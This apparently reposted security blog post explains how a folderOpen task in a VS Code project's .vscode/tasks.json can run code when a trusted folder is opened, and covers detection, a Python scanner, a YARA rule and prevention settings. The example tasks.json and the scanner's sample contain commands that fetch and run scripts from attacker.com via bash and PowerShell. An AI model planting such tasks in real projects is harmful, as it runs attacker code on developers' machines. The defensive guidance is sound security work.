Backdooring a VSCode Project via .vscode/tasks.json

Visual Studio Code (VSCode) can run tasks defined in a project's `.vscode/tasks.json` automatically when the folder is opened (`"runOn": "folderOpen"`). Because that file is normally committed with the code, an attacker who can get a developer to open a repository they control, or who can push to a repository the developer already trusts, can turn it into a stealthy backdoor that executes arbitrary commands on the developer's machine. One caveat the original write-up omits: VSCode only runs folder-open tasks in a workspace the user has marked as trusted (Workspace Trust) and while automatic tasks are allowed, so the attack depends on the victim accepting that prompt, which is a routine click for a repository they believe is legitimate.

How the Attack Works

1. Malicious `tasks.json` Setup:

An attacker modifies or creates a `.vscode/tasks.json` file in a project directory with a predefined command that executes a malicious payload.

Example `tasks.json`:

{
  "version": "2.0.0",
  "tasks": [
    {
      "label": "Malicious Task",
      "type": "shell",
      "command": "bash -c 'curl http://attacker.com/mal.sh | bash'",
      "runOptions": {
        "runOn": "folderOpen"
      }
    }
  ]
}

2. Automatic Execution:

When the victim opens the infected folder in VSCode and the workspace is trusted (automatic tasks allowed), the task runs with no further interaction, so the payload is fetched and executed before the developer has looked at a single source file.

3. Persistence & Evasion:

Since `.vscode/` is a standard directory that is routinely committed and rarely reviewed, the task goes unnoticed unless someone inspects `tasks.json` directly, and a task given an innocuous `label` (a build or watch step) blends in with legitimate project automation.

You Should Know: Detecting & Preventing This Attack

Detection Methods

  • Check `tasks.json` for Suspicious Commands (use `grep -E`; without it the `|` is matched literally and nothing is found):
    grep -iE "curl|wget|bash|powershell|runOn" .vscode/tasks.json
    

  • Audit VSCode Extensions & Configs:

    ls -la ~/.vscode/extensions/ 
    

  • Monitor Process Execution (children of the VSCode process are the interesting ones; `sh` is left out of the pattern because it matches almost every process):

    ps -eo pid,ppid,cmd | grep -E "curl|wget|bash|python" | grep -v grep
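
The detection above as a small Python scanner, added here as an example and not code from the original post: it parses `.vscode/tasks.json` the way VSCode does (comments and trailing commas allowed), picks out tasks with `"runOn": "folderOpen"`, and flags those whose command, args or per-OS overrides (`linux`, `windows`, `osx`) contain download-and-execute patterns, which a plain grep for `curl` misses when the payload sits in an `args` object or an override. The sample `tasks.json` inside it is constructed, the suspicious-pattern list is an assumption, and `attacker.com` is the post's own placeholder.

```python
"""Scan a VS Code tasks.json for folderOpen tasks that download and run code.
Added example for this post, not code from the original."""
import json
import re

# Download/execute indicators (assumed list; extend for your environment).
SUSPICIOUS = re.compile(
    r"\b(curl|wget|certutil|bitsadmin|Invoke-WebRequest|iwr|Invoke-Expression|iex)\b"
    r"|\|\s*(ba|z)?sh\b"   # "... | bash"
    r"|https?://",         # any remote fetch in an auto-run task deserves a look
    re.IGNORECASE,
)
OS_KEYS = ("linux", "windows", "osx")


def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments outside string literals, then trailing
    commas, so json.loads accepts VS Code's JSONC. A state machine rather than
    a regex, so "http://..." inside a command string survives."""
    out, i, n, in_str = [], 0, len(text), False
    while i < n:
        c = text[i]
        if in_str:
            out.append(c)
            if c == "\\" and i + 1 < n:       # keep the escaped char verbatim
                out.append(text[i + 1])
                i += 2
                continue
            in_str = c != '"'
            i += 1
        elif c == '"':
            in_str = True
            out.append(c)
            i += 1
        elif text.startswith("//", i):
            j = text.find("\n", i)
            i = n if j == -1 else j           # keep the newline itself
        elif text.startswith("/*", i):
            j = text.find("*/", i + 2)
            i = n if j == -1 else j + 2
        else:
            out.append(c)
            i += 1
    return re.sub(r",(\s*[}\]])", r"\1", "".join(out))


def parse_tasks(text: str) -> dict:
    return json.loads(strip_jsonc(text))


def _command_text(task: dict) -> str:
    """Flatten command + args of a task and of its per-OS overrides."""
    parts = []
    for scope in [task] + [task.get(k) for k in OS_KEYS]:
        if not isinstance(scope, dict):
            continue
        cmd = scope.get("command")
        if isinstance(cmd, str):
            parts.append(cmd)
        elif isinstance(cmd, list):
            parts.extend(str(c) for c in cmd)
        for arg in scope.get("args") or []:   # args may be {"value": ..., "quoting": ...}
            parts.append(arg if isinstance(arg, str) else str(arg.get("value", arg)))
    return " ".join(parts)


def find_auto_run_tasks(text: str) -> list:
    """Every folderOpen task with its flattened command line and a verdict."""
    findings = []
    for task in parse_tasks(text).get("tasks", []):
        if (task.get("runOptions") or {}).get("runOn") != "folderOpen":
            continue
        cmd = _command_text(task)
        findings.append({"label": task.get("label", "<unnamed>"),
                         "command": cmd,
                         "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def scan_file(path: str) -> list:
    with open(path, encoding="utf-8-sig") as fh:   # tolerate a BOM
        return find_auto_run_tasks(fh.read())


# Constructed sample: a benign auto task, a manual task, the post's bash task,
# and a PowerShell variant hidden in an args object plus a "windows" override.
SAMPLE_TASKS_JSON = r'''{
  // constructed sample, not a real project file
  "version": "2.0.0",
  "tasks": [
    { "label": "Watch", "type": "npm", "script": "watch",
      "runOptions": { "runOn": "folderOpen" }, },   /* benign */
    { "label": "Fetch deps", "type": "shell",
      "command": "curl -O https://example.invalid/deps.tgz" },  // manual only
    { "label": "Malicious Task", "type": "shell",
      "command": "bash -c 'curl http://attacker.com/mal.sh | bash'",
      "runOptions": { "runOn": "folderOpen" } },
    { "label": "Win helper", "type": "shell", "command": "powershell",
      "args": ["-nop", "-c", { "value": "iex (iwr http://attacker.com/p.ps1)", "quoting": "strong" }],
      "windows": { "command": "powershell.exe" },
      "runOptions": { "runOn": "folderOpen" } },
  ]
}'''

if __name__ == "__main__":
    for f in find_auto_run_tasks(SAMPLE_TASKS_JSON):
        print(("SUSPICIOUS " if f["suspicious"] else "ok         ") + f["label"] + ": " + f["command"])
```

Run it against a real checkout with `scan_file(".vscode/tasks.json")`; the manual `Fetch deps` task is deliberately not reported, because a download that only runs when a developer explicitly invokes it is a different risk from one that fires on folder open.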
    

Prevention Steps

1. Disable Auto-Run Tasks:

  • Go to VSCode Settings (Ctrl + ,) → search `task.allowAutomaticTasks` → set it to `off` (in `settings.json`: `"task.allowAutomaticTasks": "off"`). The `task.autoDetect` setting named in the original post only controls auto-detection of npm/gulp/grunt tasks and does not stop `folderOpen` tasks. Keep Workspace Trust enabled (`security.workspace.trust.enabled`) so unfamiliar folders open in Restricted Mode, where automatic tasks never run.

2. Restrict File Permissions:

chmod -R 750 .vscode/ 

This only keeps other local accounts from editing the directory; it does nothing against a `tasks.json` that arrived with the repository itself, so treat it as hygiene rather than a control.

3. Use Security Tools:

  • YARA Rule for Malicious tasks.json (the rule requires the auto-run marker, otherwise every `bash` or `curl` in a normal build task fires it):
    rule vscode_malicious_task {
    meta:
    description = "Auto-run VS Code task that downloads or pipes into a shell"
    strings:
    $run = "folderOpen" nocase
    $curl = "curl" nocase
    $wget = "wget" nocase
    $bash = "| bash" nocase
    $iwr = "Invoke-WebRequest" nocase
    $iex = "Invoke-Expression" nocase
    condition:
    $run and any of ($curl, $wget, $bash, $iwr, $iex)
    }
    

4. Verify Project Integrity:

git log -p -- .vscode/tasks.json   # for Git projects

Expected Output

If a malicious `tasks.json` is present, the detection commands above should surface the `folderOpen` task and its download-and-execute command; the process and network checks only show activity while the payload is running, so inspect the file first.

What Undercode Say

This attack vector demonstrates how development environments can be weaponized. Developers must:
– Audit configurations (grep -r "runOn" .vscode/).
– Use isolated environments (Docker, VMs) for untrusted projects.
– Monitor child processes (strace -f -e execve code .).

Linux & Windows Commands for Further Analysis:

 Linux: Check running VSCode processes 
ps -ef | grep -i "code"

Windows: Detect malicious tasks 
Get-Content .vscode\tasks.json | Select-String "curl|wget|powershell"

Linux: Network monitoring 
sudo tcpdump -i any -n port 80 or port 443

Windows: Process monitoring 
Get-WmiObject Win32_Process | Where-Object { $_.CommandLine -match "curl|wget" } 

Prediction

As DevSecOps grows, attackers will increasingly target CI/CD pipelines and IDE configurations. Future variants may exploit VSCode extensions or debug configurations.

Expected Output:

  • Detection of unauthorized task executions.
  • Prevention of automatic code execution via secure configurations.


Reported By: Saad Ahla – Hackers Feeds
